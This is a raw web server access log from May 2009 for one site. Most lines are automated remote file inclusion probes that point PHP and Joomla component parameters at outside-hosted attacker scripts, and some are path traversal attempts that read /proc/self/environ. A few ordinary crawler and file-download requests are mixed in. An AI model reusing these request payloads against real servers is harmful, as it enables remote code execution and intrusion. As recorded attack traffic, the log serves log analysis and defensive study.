89.111.189.11 - - [20/May/2009:09:23:28 -0700] "GET /logs/access_080703.log//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.yokomagazine.com/mail/bin/copyright.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.111.189.11 - - [20/May/2009:09:23:28 -0700] "GET /logs//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.yokomagazine.com/mail/bin/copyright.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.111.189.11 - - [20/May/2009:09:23:29 -0700] "GET /logs/access_080826.log//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.yokomagazine.com/mail/bin/copyright.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
64.157.4.41 - - [20/May/2009:09:23:34 -0700] "GET /blog/wp-content/gallery/2009-04-12-crestlineadv/04122009bigbearDS.gpx HTTP/1.0" 200 1068632 "-" "-" "www.dmulk.com"
218.249.36.194 - - [20/May/2009:09:23:38 -0700] "GET /logs/access_090217.log%20%20/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://chicken.ucoz.org/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
65.55.104.169 - - [20/May/2009:09:23:49 -0700] "GET /robots.txt HTTP/1.1" 200 36 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
65.55.104.169 - - [20/May/2009:09:23:49 -0700] "GET /presto/?N=A HTTP/1.1" 200 526 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
218.249.36.194 - - [20/May/2009:09:23:52 -0700] "GET /index.php?menu=deti&page=http://sherif-dudulz.ucoz.com/id1.txt????? HTTP/1.1" 200 41954 "-" "Mozilla/5.0" "www.dmulk.com"
218.249.36.194 - - [20/May/2009:09:23:59 -0700] "GET /index.php?menu=deti&page=http://sherif-dudulz.ucoz.com/id1.txt????? HTTP/1.1" 200 - "-" "Mozilla/5.0" "www.dmulk.com"
64.157.4.41 - - [20/May/2009:09:24:02 -0700] "GET /blog/wp-content/gallery/2009-04-18klr/20090418.gpx HTTP/1.0" 200 727834 "-" "-" "www.dmulk.com"
202.46.2.197 - - [20/May/2009:09:24:05 -0700] "GET /logs/access_080112.log/administrator/index.php?mosConfig_absolute_path=http://www.gsmch.org/club/chi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
91.121.137.51 - - [20/May/2009:09:24:12 -0700] "GET /logs/access_080401.log/index.php?option=com_content&task=view&id=80&Itemid=46/errors.php?error=http://www.graal-plus.zp.ua//images/na-id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
91.121.137.51 - - [20/May/2009:09:24:17 -0700] "GET /logs/index.php?option=com_content&task=view&id=80&Itemid=46/errors.php?error=http://www.graal-plus.zp.ua//images/na-id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.157.4.41 - - [20/May/2009:09:24:18 -0700] "GET /blog/wp-content/gallery/2009-04-12-crestlineadv/04122009bigbearDS.gpx HTTP/1.0" 200 1068632 "-" "-" "www.dmulk.com"
200.93.147.154 - - [20/May/2009:09:24:30 -0700] "GET /logs//index2.php?mosConfig_absolute_path=http://h1.ripway.com/adi121/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
200.93.147.154 - - [20/May/2009:09:24:30 -0700] "GET /index2.php?mosConfig_absolute_path=http://h1.ripway.com/adi121/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
200.93.147.154 - - [20/May/2009:09:24:31 -0700] "GET /logs/access_081104.log%20%20//index2.php?mosConfig_absolute_path=http://h1.ripway.com/adi121/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
67.19.228.18 - - [20/May/2009:09:24:36 -0700] "GET /logs/access_080412.log//modules/xfsection/modify.php?dir_module=http://flyozoneusa.com/tmp/rfi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
67.19.228.18 - - [20/May/2009:09:24:36 -0700] "GET /logs/access_080513.log//modules/xfsection/modify.php?dir_module=http://flyozoneusa.com/tmp/rfi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
218.249.36.194 - - [20/May/2009:09:24:41 -0700] "GET /logs/access_080807.log%20%20/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://chicken.ucoz.org/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
202.177.22.67 - - [20/May/2009:09:24:41 -0700] "GET /logs/access_071224.log/modifyform.html?code=http://www.mykr.net/bbs/data/id/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
202.177.22.67 - - [20/May/2009:09:24:41 -0700] "GET /logs/modifyform.html?code=http://www.mykr.net/bbs/data/id/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
202.177.22.67 - - [20/May/2009:09:24:41 -0700] "GET /logs/access_080621.log/modifyform.html?code=http://www.mykr.net/bbs/data/id/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.111.189.11 - - [20/May/2009:09:24:43 -0700] "GET /index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.yokomagazine.com/mail/bin/copyright.txt???? HTTP/1.1" 200 42008 "-" "Mozilla/5.0" "www.dmulk.com"
200.93.147.154 - - [20/May/2009:09:24:43 -0700] "GET /index2.php?mosConfig_absolute_path=http://h1.ripway.com/gale232/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
200.93.147.154 - - [20/May/2009:09:24:44 -0700] "GET /logs/access_081104.log%20%20//index2.php?mosConfig_absolute_path=http://h1.ripway.com/gale232/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.249.36.194 - - [20/May/2009:09:24:44 -0700] "GET /logs/access_080520.log%20%20/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://chicken.ucoz.org/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
200.93.147.154 - - [20/May/2009:09:24:44 -0700] "GET /logs//index2.php?mosConfig_absolute_path=http://h1.ripway.com/gale232/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
64.157.4.43 - - [20/May/2009:09:24:44 -0700] "GET /blog/wp-content/gallery/2009-04-18klr/20090418.gpx HTTP/1.0" 200 727834 "-" "-" "www.dmulk.com"
65.23.154.225 - - [20/May/2009:09:24:46 -0700] "GET /logs/access_080809.log/index.php?option=com_jd-wp&Itemid=&mosConfig_absolute_path=%20%22com_jd-wp%22index.php?option=com_jd-wp&Itemid=&mosConfig_absolute_path=http://www.longbeachphotosbc.ca/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/4.61 [en] (OS/2; U)" "www.dmulk.com"
65.23.154.225 - - [20/May/2009:09:24:46 -0700] "GET /logs/index.php?option=com_jd-wp&Itemid=&mosConfig_absolute_path=%20%22com_jd-wp%22index.php?option=com_jd-wp&Itemid=&mosConfig_absolute_path=http://www.longbeachphotosbc.ca/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/4.61 [en] (OS/2; U)" "www.dmulk.com"
65.23.154.225 - - [20/May/2009:09:24:46 -0700] "GET /logs/access_080809.log/errors.php?error=http://www.longbeachphotosbc.ca/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0" "www.dmulk.com"
65.23.154.225 - - [20/May/2009:09:24:46 -0700] "GET /logs/errors.php?error=http://www.longbeachphotosbc.ca/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0" "www.dmulk.com"
65.23.154.225 - - [20/May/2009:09:24:46 -0700] "GET /logs/access_080809.log/index.php?option=com_jd-wp&Itemid=&mosConfig_absolute_path=%20%22com_jd-wp%22index.php?option=com_jd-wp&Itemid=&mosConfig_absolute_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 275 "-" "XXXXXX" "www.dmulk.com"
65.23.154.225 - - [20/May/2009:09:24:46 -0700] "GET /logs/access_080809.log/index.php?option=com_jd-wp&Itemid=&mosConfig_absolute_path=%20%22com_jd-wp%22index.php?option=com_jd-wp&Itemid=&mosConfig_absolute_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 275 "-" "XXXXXX" "www.dmulk.com"
65.23.154.225 - - [20/May/2009:09:24:46 -0700] "GET /logs/index.php?option=com_jd-wp&Itemid=&mosConfig_absolute_path=%20%22com_jd-wp%22index.php?option=com_jd-wp&Itemid=&mosConfig_absolute_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 275 "-" "XXXXXX" "www.dmulk.com"
65.23.154.225 - - [20/May/2009:09:24:46 -0700] "GET /logs/index.php?option=com_jd-wp&Itemid=&mosConfig_absolute_path=%20%22com_jd-wp%22index.php?option=com_jd-wp&Itemid=&mosConfig_absolute_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 275 "-" "XXXXXX" "www.dmulk.com"
62.44.79.35 - - [20/May/2009:09:24:59 -0700] "GET /logs/access_080202.log%20%20//claroline/tracking/userLog.php?rootSys=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
64.157.4.43 - - [20/May/2009:09:25:00 -0700] "GET /blog/wp-content/gallery/2009-04-12-crestlineadv/04122009bigbearDS.gpx HTTP/1.0" 200 1068632 "-" "-" "www.dmulk.com"
65.23.154.225 - - [20/May/2009:09:25:01 -0700] "GET /errors.php?error=http://www.longbeachphotosbc.ca/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0" "www.dmulk.com"
67.19.228.18 - - [20/May/2009:09:25:15 -0700] "GET /logs/access_081023.log//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=allinurl:index.php?optionhttp://www.geocities.com/andrie_it/id3.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
67.19.228.18 - - [20/May/2009:09:25:16 -0700] "GET /index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=allinurl:index.php?optionhttp://www.geocities.com/andrie_it/id3.txt???? HTTP/1.1" 200 50 "-" "libwww-perl/5.810" "www.dmulk.com"
67.19.228.18 - - [20/May/2009:09:25:16 -0700] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=allinurl:index.php?optionhttp://www.geocities.com/andrie_it/id3.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
91.121.137.51 - - [20/May/2009:09:25:27 -0700] "GET /index.php?option=com_content&task=view&id=80&Itemid=46/errors.php?error=http://www.graal-plus.zp.ua//images/na-id.txt??? HTTP/1.1" 200 42023 "-" "libwww-perl/5.805" "www.dmulk.com"
67.19.228.18 - - [20/May/2009:09:25:31 -0700] "GET /logs/access_080606.log//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=allinurl:index.php?optionhttp://www.geocities.com/andrie_it/id3.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
65.23.154.225 - - [20/May/2009:09:25:32 -0700] "GET /logs/access_080812.log/index.php?option=com_jd-wp&Itemid=&mosConfig_absolute_path=%20%22com_jd-wp%22index.php?option=com_jd-wp&Itemid=&mosConfig_absolute_path=http://www.longbeachphotosbc.ca/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/4.61 [en] (OS/2; U)" "www.dmulk.com"
65.23.154.225 - - [20/May/2009:09:25:32 -0700] "GET /logs/access_080812.log/errors.php?error=http://www.longbeachphotosbc.ca/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0" "www.dmulk.com"
65.23.154.225 - - [20/May/2009:09:25:33 -0700] "GET /logs/access_080812.log/index.php?option=com_jd-wp&Itemid=&mosConfig_absolute_path=%20%22com_jd-wp%22index.php?option=com_jd-wp&Itemid=&mosConfig_absolute_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 275 "-" "XXXXXX" "www.dmulk.com"
65.23.154.225 - - [20/May/2009:09:25:33 -0700] "GET /logs/access_080812.log/index.php?option=com_jd-wp&Itemid=&mosConfig_absolute_path=%20%22com_jd-wp%22index.php?option=com_jd-wp&Itemid=&mosConfig_absolute_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 275 "-" "XXXXXX" "www.dmulk.com"
218.249.36.194 - - [20/May/2009:09:25:34 -0700] "GET /homepage.php?sel=http://sherif-dudulz.ucoz.com/id1.txt????? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.249.36.194 - - [20/May/2009:09:25:34 -0700] "GET /logs/access_080520.log%20%20/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://chicken.ucoz.org/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.249.36.194 - - [20/May/2009:09:25:34 -0700] "GET /logs/access_080313.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://sherif-dudulz.ucoz.com/id1.txt????? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.249.36.194 - - [20/May/2009:09:25:34 -0700] "GET /logs/access_080820.log%20%20/homepage.php?sel=http://sherif-dudulz.ucoz.com/id1.txt????? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.249.36.194 - - [20/May/2009:09:25:34 -0700] "GET /logs/access_081105.log%20%20/homepage.php?sel=http://sherif-dudulz.ucoz.com/id1.txt????? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.249.36.194 - - [20/May/2009:09:25:34 -0700] "GET /logs/homepage.php?sel=http://sherif-dudulz.ucoz.com/id1.txt????? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.249.36.194 - - [20/May/2009:09:25:35 -0700] "GET /logs/access_080807.log%20%20/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://chicken.ucoz.org/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
64.157.4.42 - - [20/May/2009:09:25:35 -0700] "GET /blog/wp-content/gallery/2009-04-18klr/20090418.gpx HTTP/1.0" 200 727834 "-" "-" "www.dmulk.com"
211.241.40.51 - - [20/May/2009:09:25:36 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://emokid01.fileave.com/Emo_Blodddy.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.241.40.51 - - [20/May/2009:09:25:36 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://emokid01.fileave.com/Emo_Blodddy.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.241.40.51 - - [20/May/2009:09:25:36 -0700] "GET /logs/access_090217.log/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://emokid01.fileave.com/Emo_Blodddy.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
67.19.228.18 - - [20/May/2009:09:25:43 -0700] "GET /logs/access_081023.log//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=allinurl:index.php?optionhttp://www.geocities.com/andrie_it/id3.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
62.44.79.35 - - [20/May/2009:09:25:43 -0700] "GET /logs/access_080110.log%20%20//claroline/tracking/userLog.php?rootSys=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
67.19.228.18 - - [20/May/2009:09:25:47 -0700] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=allinurl:index.php?optionhttp://www.geocities.com/andrie_it/id3.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
218.249.36.194 - - [20/May/2009:09:25:47 -0700] "GET /logs/access_081105.log/homepage.php?sel=http://sherif-dudulz.ucoz.com/id1.txt????? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.249.36.194 - - [20/May/2009:09:25:47 -0700] "GET /logs/homepage.php?sel=http://sherif-dudulz.ucoz.com/id1.txt????? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.249.36.194 - - [20/May/2009:09:25:48 -0700] "GET /homepage.php?sel=http://sherif-dudulz.ucoz.com/id1.txt????? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.249.36.194 - - [20/May/2009:09:25:48 -0700] "GET /logs/access_080820.log/homepage.php?sel=http://sherif-dudulz.ucoz.com/id1.txt????? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
64.157.4.42 - - [20/May/2009:09:25:50 -0700] "GET /blog/wp-content/gallery/2009-04-12-crestlineadv/04122009bigbearDS.gpx HTTP/1.0" 200 1068632 "-" "-" "www.dmulk.com"
67.19.228.18 - - [20/May/2009:09:25:51 -0700] "GET /logs/access_080608.log//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=allinurl:index.php?optionhttp://www.geocities.com/andrie_it/id3.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
67.19.228.18 - - [20/May/2009:09:26:00 -0700] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=allinurl:index.php?optionhttp://www.geocities.com/andrie_it/id3.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
64.157.4.43 - - [20/May/2009:09:26:04 -0700] "GET /blog/wp-content/gallery/2009-04-18klr/20090418.gpx HTTP/1.0" 200 727834 "-" "-" "www.dmulk.com"
67.19.228.18 - - [20/May/2009:09:26:05 -0700] "GET /logs/access_081023.log//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=allinurl:index.php?optionhttp://www.geocities.com/andrie_it/id3.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
67.19.228.18 - - [20/May/2009:09:26:05 -0700] "GET /index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=allinurl:index.php?optionhttp://www.geocities.com/andrie_it/id3.txt???? HTTP/1.1" 200 50 "-" "libwww-perl/5.810" "www.dmulk.com"
64.157.4.42 - - [20/May/2009:09:26:09 -0700] "GET /blog/wp-content/gallery/2009-04-18klr/20090418.gpx HTTP/1.0" 200 727834 "-" "-" "www.dmulk.com"
67.19.228.18 - - [20/May/2009:09:26:16 -0700] "GET /logs/access_080606.log//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=allinurl:index.php?optionhttp://www.geocities.com/andrie_it/id3.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
218.249.36.194 - - [20/May/2009:09:26:17 -0700] "GET /logs/access_081105.log%20%20/homepage.php?sel=http://sherif-dudulz.ucoz.com/id1.txt????? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.249.36.194 - - [20/May/2009:09:26:17 -0700] "GET /homepage.php?sel=http://sherif-dudulz.ucoz.com/id1.txt????? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.249.36.194 - - [20/May/2009:09:26:17 -0700] "GET /logs/access_080820.log%20%20/homepage.php?sel=http://sherif-dudulz.ucoz.com/id1.txt????? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.249.36.194 - - [20/May/2009:09:26:17 -0700] "GET /logs/homepage.php?sel=http://sherif-dudulz.ucoz.com/id1.txt????? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
64.157.4.43 - - [20/May/2009:09:26:19 -0700] "GET /blog/wp-content/gallery/2009-04-12-crestlineadv/04122009bigbearDS.gpx HTTP/1.0" 200 1068632 "-" "-" "www.dmulk.com"
65.23.154.225 - - [20/May/2009:09:26:27 -0700] "GET /index.php?option=com_jd-wp&Itemid=&mosConfig_absolute_path=%20%22com_jd-wp%22index.php?option=com_jd-wp&Itemid=&mosConfig_absolute_path=http://www.longbeachphotosbc.ca/buggsbunny?? HTTP/1.1" 200 - "-" "Mozilla/4.61 [en] (OS/2; U)" "www.dmulk.com"
67.19.228.18 - - [20/May/2009:09:26:30 -0700] "GET /index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=allinurl:index.php?optionhttp://www.geocities.com/andrie_it/id3.txt???? HTTP/1.1" 200 50 "-" "libwww-perl/5.810" "www.dmulk.com"
67.19.228.18 - - [20/May/2009:09:26:33 -0700] "GET /logs/access_080606.log//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=allinurl:index.php?optionhttp://www.geocities.com/andrie_it/id3.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
64.157.4.42 - - [20/May/2009:09:26:36 -0700] "GET /blog/wp-content/gallery/2009-04-12-crestlineadv/04122009bigbearDS.gpx HTTP/1.0" 200 1068632 "-" "-" "www.dmulk.com"
65.23.154.225 - - [20/May/2009:09:26:43 -0700] "GET /index.php?option=com_jd-wp&Itemid=&mosConfig_absolute_path=%20%22com_jd-wp%22index.php?option=com_jd-wp&Itemid=&mosConfig_absolute_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 200 - "-" "XXXXXX" "www.dmulk.com"
67.19.228.18 - - [20/May/2009:09:26:45 -0700] "GET /logs/access_080608.log//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=allinurl:index.php?optionhttp://www.geocities.com/andrie_it/id3.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
202.177.22.67 - - [20/May/2009:09:26:52 -0700] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.mykr.net/bbs/data/id/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
202.177.22.67 - - [20/May/2009:09:26:52 -0700] "GET /logs/access_071225.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.mykr.net/bbs/data/id/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
202.177.22.67 - - [20/May/2009:09:26:52 -0700] "GET /logs/access_071109.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.mykr.net/bbs/data/id/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
210.240.12.4 - - [20/May/2009:09:26:53 -0700] "GET /logs//include/bbs.lib.inc.php?site_path=http://www.monkeyinktattoos.com//modules/xcgal/albums/userpics/10001/black/fx29id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
210.240.12.4 - - [20/May/2009:09:26:53 -0700] "GET /logs/access_080619.log//include/bbs.lib.inc.php?site_path=http://www.monkeyinktattoos.com//modules/xcgal/albums/userpics/10001/black/fx29id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
210.240.12.4 - - [20/May/2009:09:26:53 -0700] "GET /logs/access_080925.log//include/bbs.lib.inc.php?site_path=http://www.monkeyinktattoos.com//modules/xcgal/albums/userpics/10001/black/fx29id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
210.240.12.4 - - [20/May/2009:09:26:53 -0700] "GET /include/bbs.lib.inc.php?site_path=http://www.monkeyinktattoos.com//modules/xcgal/albums/userpics/10001/black/fx29id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
200.93.147.154 - - [20/May/2009:09:26:56 -0700] "GET /logs/access_081117.log%20%20//index2.php?mosConfig_absolute_path=http://h1.ripway.com/roni121/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
65.23.154.225 - - [20/May/2009:09:26:58 -0700] "GET /index.php?option=com_jd-wp&Itemid=&mosConfig_absolute_path=%20%22com_jd-wp%22index.php?option=com_jd-wp&Itemid=&mosConfig_absolute_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 - "-" "XXXXXX" "www.dmulk.com"
67.19.228.18 - - [20/May/2009:09:27:06 -0700] "GET /logs/access_080608.log//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=allinurl:index.php?optionhttp://www.geocities.com/andrie_it/id3.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
122.153.212.195 - - [20/May/2009:09:27:39 -0700] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://stonemac.com/bbs/g/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
122.153.212.195 - - [20/May/2009:09:27:43 -0700] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://stonemac.com/bbs/g/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
122.153.212.195 - - [20/May/2009:09:27:47 -0700] "GET /logs/access_080616.log///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://stonemac.com/bbs/g/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
67.19.228.18 - - [20/May/2009:09:27:50 -0700] "GET /logs/access_080723.log//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=allinurl:index.php?optionhttp://www.geocities.com/andrie_it/id3.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
200.93.147.154 - - [20/May/2009:09:27:50 -0700] "GET /logs/access_081117.log%20%20//index2.php?mosConfig_absolute_path=http://h1.ripway.com/luna121/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
200.93.147.154 - - [20/May/2009:09:28:13 -0700] "GET /logs/access_081104.log//index2.php?mosConfig_absolute_path=http://h1.ripway.com/roni121/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.249.36.194 - - [20/May/2009:09:28:17 -0700] "GET /logs/access_080820.log/homepage.php?sel=http://sherif-dudulz.ucoz.com/id1.txt????? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.249.36.194 - - [20/May/2009:09:28:17 -0700] "GET /logs/access_081105.log/homepage.php?sel=http://sherif-dudulz.ucoz.com/id1.txt????? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
200.93.147.154 - - [20/May/2009:09:28:29 -0700] "GET /logs/access_081117.log//index2.php?mosConfig_absolute_path=http://h1.ripway.com/roni121/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
123.143.98.5 - - [20/May/2009:09:28:38 -0700] "GET /show.php?path=http://dunpo.wisegiga.net/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
123.143.98.5 - - [20/May/2009:09:28:38 -0700] "GET /logs/show.php?path=http://dunpo.wisegiga.net/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
123.143.98.5 - - [20/May/2009:09:28:38 -0700] "GET /logs/access_090120.log/show.php?path=http://dunpo.wisegiga.net/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
123.143.98.5 - - [20/May/2009:09:28:38 -0700] "GET /logs/access_080120.log/show.php?path=http://dunpo.wisegiga.net/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
123.143.98.5 - - [20/May/2009:09:28:39 -0700] "GET /logs/access_080120.log/show.php?path=http://dunpo.wisegiga.net/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
